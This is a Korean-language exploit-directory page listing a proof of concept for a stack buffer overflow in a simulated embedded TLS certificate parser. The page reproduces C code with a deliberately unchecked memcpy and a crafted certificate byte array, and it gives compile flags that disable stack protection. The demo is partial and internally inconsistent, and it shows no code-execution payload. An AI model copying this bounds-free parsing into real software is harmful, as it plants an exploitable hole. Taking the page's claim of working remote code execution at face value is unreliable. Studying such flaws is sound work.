Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser — 조작된 X.509 SAN 확장을 사용하여 임베디드 TLS 인증서 파서에서 스택 버퍼 오버플로를 유발하는 PoC로, IoT 및 산업용 기기에서 원격 코드 실행을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/george0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationLearning & EducationBinary Exploitation
GitHubgeorge0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser

CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

조작된 X.509 SAN 확장을 사용하여 임베디드 TLS 인증서 파서에서 스택 버퍼 오버플로를 유발하는 PoC로, IoT 및 산업용 기기에서 원격 코드 실행을 가능하게 합니다.

저장소 보기
101개월 전아직 검토되지 않음

9. CVE-2026-6789 – 임베디드 TLS 인증서 파서의 스택 버퍼 오버플로우

개요

널리 사용되는 경량 TLS 라이브러리(시뮬레이션)에는 조작된 길이 필드가 포함된 X.509 인증서 Subject Alternative Name 확장을 파싱할 때 스택 버퍼 오버플로우가 존재합니다.

심각도: Critical (IoT/산업용 장치에서의 RCE)

취약한 C 파서 및 익스플로잇

// tls_x509_vuln.c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>

// Vulnerable certificate parser
struct cert {
    uint8_t *data;
    size_t len;
};

int parse_san_extension(struct cert *cert, char *san_out, size_t out_size) {
    // Assume we are inside an extension with OID for SAN.
    uint8_t *p = cert->data + 10; // skip to extension value
    uint16_t ext_len = (p[0] << 8) | p[1];
    p += 2;
    // ext_len includes a sequence of GeneralNames. We only handle dNSName.
    while (p < cert->data + cert->len) {
        uint8_t name_type = *p++;
        uint16_t name_len = (p[0] << 8) | p[1];
        p += 2;
        if (name_type == 2) { // dNSName
            // Vulnerability: memcpy without bounds check to san_out
            memcpy(san_out, p, name_len); // STACK BUFFER OVERFLOW if name_len > out_size
            san_out[name_len] = '\0';
            return 0;
        }
        p += name_len;
    }
    return -1;
}

int main(int argc, char **argv) {
    // Malicious certificate payload: crafted SAN with oversized dNSName
    uint8_t malicious_cert[] = {
        // ... header, then extension:
        0x30, 0x12, // SEQUENCE extension
        0x06, 0x03, 0x55, 0x1d, 0x11, // OID SAN
        0x04, 0x0b, // octet string, length 11
        // ext_len (should be 0x0009 but we use 0x00ff to overflow)
        0x00, 0xff, // ext_len = 255 (overstated)
        // Then a dNSName: type 2, length huge
        0x02, 0x01, 0x41, // dNSName "A" but the parser will read massive length due to ext_len
    };
    struct cert cert;
    cert.data = malicious_cert;
    cert.len = sizeof(malicious_cert);

    char san[16]; // small buffer
    parse_san_extension(&cert, san, sizeof(san));
    printf("SAN: %s\n", san);
    return 0;
}

CVE-2026-6789 – 임베디드 TLS X.509 SAN 스택 오버플로우

Severity: Critical

📖 개요

널리 사용되는 임베디드 TLS 라이브러리의 인증서 파서에 존재하는 스택 기반 버퍼 오버플로우로 인해, 장치가 특수하게 조작된 X.509 인증서를 처리할 때 원격 코드 실행이 가능합니다.

⚙️ 취약점 세부 정보

  • 유형: 스택 버퍼 오버플로우
  • 영향: 원격 코드 실행(TLS 서버에서 사전 인증(pre-auth))
  • 근본 원인: 파서가 Subject Alternative Name 확장에서 DNS 이름을 복사할 때 출력 버퍼 크기에 대한 검증 없이 길이 필드를 사용합니다.

🧪 익스플로잇 데모

  1. 악성 인증서 생성:
    python craft_exploit_cert.py
    
  2. 취약한 파서 컴파일 및 실행(시뮬레이션):
    gcc tls_x509_vuln.c -o parser -fno-stack-protector -z execstack
    ./parser malicious.cer
    
도구 다운로드